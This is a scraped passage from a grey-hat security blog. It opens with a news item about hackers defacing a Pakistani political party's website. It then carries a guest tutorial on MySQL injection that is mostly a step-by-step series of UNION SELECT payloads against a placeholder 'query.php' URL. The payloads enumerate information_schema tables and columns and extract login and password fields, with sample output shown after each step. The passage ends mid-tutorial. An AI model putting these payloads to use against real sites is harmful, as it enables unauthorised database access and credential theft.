<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgOs7u9ayvnaIdRmXTdYWQrkDf9oWK6R0lM8lhbpvWu-luULZC8vhjVzIdCVlEjmwAYtTpv5w8NZoZjhYoLcsjuZyf-MPVBKg2z7GuM7sa-7plTbP34jINdlPPi6DGoQ8Z5KSi0J8Pn6U/s1600/Pakistan_Peoples_Party_Hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgOs7u9ayvnaIdRmXTdYWQrkDf9oWK6R0lM8lhbpvWu-luULZC8vhjVzIdCVlEjmwAYtTpv5w8NZoZjhYoLcsjuZyf-MPVBKg2z7GuM7sa-7plTbP34jINdlPPi6DGoQ8Z5KSi0J8Pn6U/s400/Pakistan_Peoples_Party_Hacked.png" width="400" /></a></div>
<span style="text-align: justify;">A new young hacker going by the alias name of </span><b style="text-align: justify;"><span style="color: red;">Dr41DeY</span></b><span style="text-align: justify;">, from a newly formed <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers community</a> named </span><b style="text-align: justify;">Nigerian Cyber Army</b><span style="text-align: justify;"> target a high profile website of <a href="http://www.voiceofgreyhat.com/search?q=Pakistan">Pakistan</a> and blown the official website of </span><b style="text-align: justify;"><a href="http://www.ppp.org.pk/">Pakistan People's Party (PPP)</a></b><span style="text-align: justify;">. As per relevant sources; this <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attack</a> taken place on November 30th where the hacker has managed to gain access on the server of PPP and after gaining access he deleted important files from the server and changed the site index page. In other word has <a href="http://www.voiceofgreyhat.com/search/label/defacement">defaced</a> People's Party index page with the logo of Nigerian Cyber Army while leaving few warning to the webmaster. After the hack, the hacker has created what it called a </span><a href="http://gyazo.com/0b224bbe5a5f5fd540c83c103b29856b" style="text-align: justify;">image archive</a><span style="text-align: justify;"> to prove the defacement. People's Party has not yet officially responded to this issue, but immediately after the hack taken place, PPP authorities have sent their site offline. And after few years the index page get restored while displaying the message of <i><span style="color: red;">"Website is under Development, it will come live soon. Sorry for inconvenience"</span></i>. By the time of writing this story, the website of PPP remained under construction. </span><br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><u>Brief About Pakistan People's Party (PPP):-</u></b> The Pakistan Peoples Party (PPP) is a mainstream political party in Pakistan. It is led by "life chairperson" <b>Benazir Bhutto</b>. The Pakistan Peoples Party Parliamentarians (PPPP) is a party formed in 2002 by the PPP for the purpose of complying with electoral rules governing Pakistani parties. At the last legislative elections, 20 October 2002, the party won 25.8 % of the popular vote and 71 out of 272 elected members, thus gaining the second-largest number of seats in the Parliament of Pakistan. The party was founded in 1967, on November 30th and Zulfikar Ali Bhutto became its first chairman. The party creed is: "Islam is our faith; democracy is our politics; socialism is our economy; all power to the people."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-18881884879354912882013-12-02T01:00:00.000+05:302013-12-02T01:00:52.333+05:30We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">We Are The Best Tool For Web Application Security</span></b> <b>(Discovering The Infamous Sql-injection Technique)</b></span> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZJPIRHi2f9TBPT8uodIii7qcHkTESL33RfFvNSegAWw0ZIyRcg3Ym-RQoqKbKnCj6bRkJcB9Bc7pT8nQGbVEV1KRnPXjX7bE39VOZT-8CXpTNc0iXhF1kVQvw3tPoKCp2xr1_0jbOwwg/s1600/Sql-injection_Technique_vogh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZJPIRHi2f9TBPT8uodIii7qcHkTESL33RfFvNSegAWw0ZIyRcg3Ym-RQoqKbKnCj6bRkJcB9Bc7pT8nQGbVEV1KRnPXjX7bE39VOZT-8CXpTNc0iXhF1kVQvw3tPoKCp2xr1_0jbOwwg/s400/Sql-injection_Technique_vogh.jpg" width="400" /></a></div>
<br />
Today I am proudly sharing an article made by <b>Mr. Rafael Souza</b> one of the great admirer and fan of <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b> has gladly shared his brilliant research paper on <b><a href="http://www.voiceofgreyhat.com/search?q=sql-i">SQL-Injection (MySql)</a></b> with us. Rafael is a very passionate on <a href="http://www.voiceofgreyhat.com/search?q=cyber+security">cyber security</a> domain and he is keenly involved with <b>GreyHat</b> Community and Maintainer design of Brazilian <b><a href="http://www.voiceofgreyhat.com/search?q=Backtrack">Backtrack Team</a></b>. So without wasting time lets go and see what Rafael has for us:- </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;"><b>Discover The Infamous MySQL Injection Technique</b> </span><br />
<div style="text-align: left;">
<span style="text-align: right;"><span style="font-size: large;"> </span></span></div>
</div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4UaP9-PJzUpe3URNaRkqNgJiqQazrtHyf_WfrjAkJQqAcGux4y1Rkbn78KjmKuG-Gak08pGXFxteNavkprhxJbjYdLZ-VH3ERfl1XKAPNFfUYKk7wL2jiB8U4SG8xavMkI1HiCSR94sE/s1600/rafael_souza_vogh.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4UaP9-PJzUpe3URNaRkqNgJiqQazrtHyf_WfrjAkJQqAcGux4y1Rkbn78KjmKuG-Gak08pGXFxteNavkprhxJbjYdLZ-VH3ERfl1XKAPNFfUYKk7wL2jiB8U4SG8xavMkI1HiCSR94sE/s200/rafael_souza_vogh.png" width="178" /></a><span style="font-family: inherit;"><b><u>ABSTRACT:</u></b></span><br />
<div style="text-align: justify;">
<span style="font-family: inherit;">It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. </span><span style="font-family: inherit;">Did you know that numerous inventions and discoveries are due to misconceptions?</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.</span></div>
<br />
<span style="font-family: inherit;"><b><u>Understand the technique MySQL Injection: </u></b></span><br />
<div style="text-align: justify;">
<span style="font-family: inherit;">One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. </span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<b><u>STEP BY STEP</u></b></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikg4BMjrdtm9pS10PVhiwZ8JPZ9CgauU2mCByDG0Rts89IFQqPgPRbycH9EL8PJuOjOPSLQ4BhbsVbHLN2jHbgpKj_sYw3p0lUnM9GbrXLPYoDUBLTax2P__rEe2oP_ln2KVRVpev01Fg/s1600/sqli.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikg4BMjrdtm9pS10PVhiwZ8JPZ9CgauU2mCByDG0Rts89IFQqPgPRbycH9EL8PJuOjOPSLQ4BhbsVbHLN2jHbgpKj_sYw3p0lUnM9GbrXLPYoDUBLTax2P__rEe2oP_ln2KVRVpev01Fg/s400/sqli.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 1) Detecting</span></div>
<div style="text-align: justify;">
Searching Column number (s): We will test earlier in error, then no error may be said to find.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIvfp6d5seaPwpH9s4P7VZ8JUZADWRis_57aVUQRlh8sodyD5CzxCLyfQD6DlDABFuRY23jvFiZc9YDqzQ9hCodhSkkjICN0JoRytwfWbayHnQF-Agwv_I8gMEpQWngscgGKUttod2yHs/s1600/sqli2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIvfp6d5seaPwpH9s4P7VZ8JUZADWRis_57aVUQRlh8sodyD5CzxCLyfQD6DlDABFuRY23jvFiZc9YDqzQ9hCodhSkkjICN0JoRytwfWbayHnQF-Agwv_I8gMEpQWngscgGKUttod2yHs/s320/sqli2.jpg" width="279" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 2) SQL Error </span></div>
<div style="text-align: left;">
<div>
Host Information,</div>
<div>
Version of MySQL system used on the server.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi90G_rz1IsTnbYgiHzEy-PhCDXjVsbQ1CPgi27S0zOObxdqHTMo5GcHCki8Mb4R7DQuLcysdoX7koWXy4DnBQ9MfeTjaRBKuxaoIcjXB3IqFt63pNm9odWWvB8OSxpwCnh1jhlHBYsyDA/s1600/sqli3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi90G_rz1IsTnbYgiHzEy-PhCDXjVsbQ1CPgi27S0zOObxdqHTMo5GcHCki8Mb4R7DQuLcysdoX7koWXy4DnBQ9MfeTjaRBKuxaoIcjXB3IqFt63pNm9odWWvB8OSxpwCnh1jhlHBYsyDA/s400/sqli3.jpg" width="400" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 3) Host Information</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5kIsEgUWc9wIqbeLxhrodTlYTLyLhyLGEBz9Bmj6kBlJe6zGrIcgRPhkNFXqFzSJJFqkNyJlA2uAiz3CkhkkmvOxVt7aJ-_f3jD5kfIAu_3trqC4Y2-vwpNc1gMr4EsSDJ7CRM9sCic/s1600/sqli4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5kIsEgUWc9wIqbeLxhrodTlYTLyLhyLGEBz9Bmj6kBlJe6zGrIcgRPhkNFXqFzSJJFqkNyJlA2uAiz3CkhkkmvOxVt7aJ-_f3jD5kfIAu_3trqC4Y2-vwpNc1gMr4EsSDJ7CRM9sCic/s320/sqli4.jpg" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 4) Location of the Files</span></div>
<div>
Current database connection used between the "input" to the MySQL system</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBRALEEZ93ippC6PnR_VL1KZSZsXCHdAuaSfsedwrRdHKkA2yzG0buT8wcVhVa8qoOcZLvreaEvwQmx7Insrrve-9Qoj3s2BkbKej2FxEqOq8qfn96e5G406LA8ZyQFLk5swkResCGRtA/s1600/sqli5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBRALEEZ93ippC6PnR_VL1KZSZsXCHdAuaSfsedwrRdHKkA2yzG0buT8wcVhVa8qoOcZLvreaEvwQmx7Insrrve-9Qoj3s2BkbKej2FxEqOq8qfn96e5G406LA8ZyQFLk5swkResCGRtA/s320/sqli5.jpg" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 5) Users of MySQL</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1lN_2x8CR2WXhY0-0qMDuC73mPV8PhFGpyG0YLEkSUkcnNdRsGgw2sp16Lveb3kcJQZ7ctBwT1HpbGgyS73tEcAGgRho3B5C6-IdQFqpwztNHqk8W_bhM8YsSI_IKCHTeuovsr_FTZRk/s1600/sqli6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1lN_2x8CR2WXhY0-0qMDuC73mPV8PhFGpyG0YLEkSUkcnNdRsGgw2sp16Lveb3kcJQZ7ctBwT1HpbGgyS73tEcAGgRho3B5C6-IdQFqpwztNHqk8W_bhM8YsSI_IKCHTeuovsr_FTZRk/s320/sqli6.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;"><span style="font-size: x-small;">(Figure 6) Current Time</span></span></div>
<div>
<div>
Brute Force or Shooting</div>
<div>
This happens in versions below 5.x.y</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJAZR7xYgPaMHSx5TCvwyA9uEAwTDlgC7prHcuCF7yhiTyW-O_DE1PqoihvtGZA7Q7MNWQvmdGrCVxy0dOAQ_JI1_shYNYP4ZXhZt8dfopKnA9S4cSO9QPA2YFsAX2PQdfUxtaooogw0o/s1600/sqli7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJAZR7xYgPaMHSx5TCvwyA9uEAwTDlgC7prHcuCF7yhiTyW-O_DE1PqoihvtGZA7Q7MNWQvmdGrCVxy0dOAQ_JI1_shYNYP4ZXhZt8dfopKnA9S4cSO9QPA2YFsAX2PQdfUxtaooogw0o/s320/sqli7.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 7) Testing</span></div>
<div>
<div class="MsoNoSpacing">
<u><b><span lang="PT-BR"><span style="font-family: inherit;"><br /></span></span></b></u></div>
<div class="MsoNoSpacing">
<u><b><span lang="PT-BR"><span style="font-family: inherit;">Dump: </span></span></b><b style="font-family: inherit;"><span lang="PT-BR">This happens in versions up 5.x.y <span style="color: dimgrey;">[ 1º
Method ]</span></span></b></u><span lang="PT-BR" style="font-family: inherit;"></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><span lang="PT-BR"><span style="color: #36648b;">http://[site]/query.php?string= </span><span style="color: #8b3a3a;">1 </span><span style="color: #fdb910;">union all select </span><span style="color: #551a8b;">1,2,3,4,</span><span style="color: mediumpurple;">group_concat(table_name)
</span><span style="color: #fdb910;">from</span> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_schema=</span><span style="color: #8b4500;">database()</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you</span><span lang="PT-BR"><br />
or<br />
Unknown column '<span style="color: mediumpurple;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you</span>'
in 'where clause' <br />
or<br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you</span>'
at line 1 <br />
<br />
<>------------------------<>-------------------------<>--------------------------<>
<br />
<br />
<b><span style="color: dimgrey;">[ 2º Method ]</span></b> <br />
<br />
<span style="color: #36648b;">http://[site]/query.php?string= </span><span style="color: #8b3a3a;">1 </span><span style="color: #fdb910;">union all select </span><span style="color: #551a8b;">1,2,3,4,</span><span style="color: mediumpurple;">concat(table_name)
</span><span style="color: #fdb910;">from</span> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">limit</span> <span style="color: deeppink;">0,1</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">CHARACTER_SETS</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">CHARACTER_SETS</span>' in
'where clause' <br />
ou <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">CHARACTER_SETS</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(table_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">limit</span> <span style="color: deeppink;">1,2</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">COLLATIONS</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">COLLATIONS</span>' in 'where
clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">COLLATIONS</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(table_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">limit</span> <span style="color: deeppink;">16,17</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">usuarios</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">usuarios</span>' in 'where
clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">usuarios</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(table_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">limit</span> <span style="color: deeppink;">17,18</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">rafael</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">rafael</span>' in 'where
clause' <br />
or<br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">rafael</span>'
at line 1 <span style="color: mediumpurple;"><o:p></o:p></span></span></span></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: center;">
<span style="font-family: inherit;"><b><span lang="PT-BR">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</span></b><span lang="PT-BR"><o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><span lang="PT-BR"><br />
</span><b><span lang="PT-BR">Searching
Column (s) of a given table<o:p></o:p></span></b></span></div>
<div class="MsoNoSpacing">
<b><span lang="PT-BR"><span style="font-family: inherit;">* Brute
Force / Shooting<o:p></o:p></span></span></b></div>
<div class="MsoNoSpacing">
<b><span lang="PT-BR"><span style="font-family: inherit;">This
happens in versions below 5.x.y<o:p></o:p></span></span></b></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">nome </span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="PT-BR"><span style="font-family: inherit;">Unknown
column '<span style="color: firebrick;">rafael1</span>' in 'field list' <br />
or<br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: firebrick;">rafael1</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">churros </span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="PT-BR"><span style="font-family: inherit;">Unknown
column '<span style="color: firebrick;">rafael1</span>' in 'field list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: firebrick;">rafael1</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">login </span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">_Rafa_</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">_Rafa_</span>' in 'field list'
<br />
or<br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">_Rafa_</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">passwd </span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">rafael1337</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">rafael1337</span>' in 'field
list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">rafael1337</span>'
at line 1 <br />
<br />
=--------------------------=--------------------------=--------------------------=--------------------------=
<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<b><span lang="PT-BR"><span style="font-family: inherit;">Dump<o:p></o:p></span></span></b></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><b><span lang="PT-BR">This
happens in versions up 5.x.y <span style="color: dimgrey;">[ 1º Method ]</span></span></b><span lang="PT-BR"> <br />
<br />
"<span style="color: firebrick;">usuarios</span>" hexadecimal ->
"<span style="color: #8b4500;">7573756172696f73</span>" <br />
<br />
<span style="color: #36648b;">http://[site]/query.php?string= </span><span style="color: #8b3a3a;">1 </span><span style="color: #fdb910;">union all select </span><span style="color: #551a8b;">1,2,3,4,</span><span style="color: mediumpurple;">group_concat(column_name)
</span><span style="color: #fdb910;">from</span> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=</span><span style="color: #8b4500;">0x7573756172696f73</span><span style="color: #551a8b;">--</span>
<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">login,passwd,id,texto</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">login,passwd,id,texto</span>'
in 'where clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">login,passwd,id,texto</span>'
at line 1 <br />
<br />
<>------------------------<>-------------------------<>--------------------------<>
<br />
<br />
<b><span style="color: dimgrey;">[ 2º Method ]</span></b> <br />
<br />
"<span style="color: firebrick;">usuarios</span>" decimal -> "<span style="color: #8b4500;">117,115,117,97,114,105,111,115</span>" <br />
<br />
<span style="color: #36648b;">http://[site]/query.php?string= </span><span style="color: #8b3a3a;">1 </span><span style="color: #fdb910;">union all select </span><span style="color: #551a8b;">1,2,3,4,</span><span style="color: mediumpurple;">concat(column_name)
</span><span style="color: #fdb910;">from</span> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=char(</span><span style="color: #8b4500;">117,115,117,97,114,105,111,115</span><span style="color: deeppink;">)</span><span style="color: #fdb910;"> limit</span> <span style="color: deeppink;">0,1</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">login</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">login</span>' in 'where
clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">login</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(column_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=char(</span><span style="color: #8b4500;">117,115,117,97,114,105,111,115</span><span style="color: deeppink;">)</span><span style="color: #fdb910;"> limit</span> <span style="color: deeppink;">1,2</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">passwd</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">passwd</span>' in 'where
clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">passwd</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(column_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=char(</span><span style="color: #8b4500;">117,115,117,97,114,105,111,115</span><span style="color: deeppink;">)</span><span style="color: #fdb910;"> limit</span> <span style="color: deeppink;">2,3</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">id</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">id</span>' in 'where clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">id</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
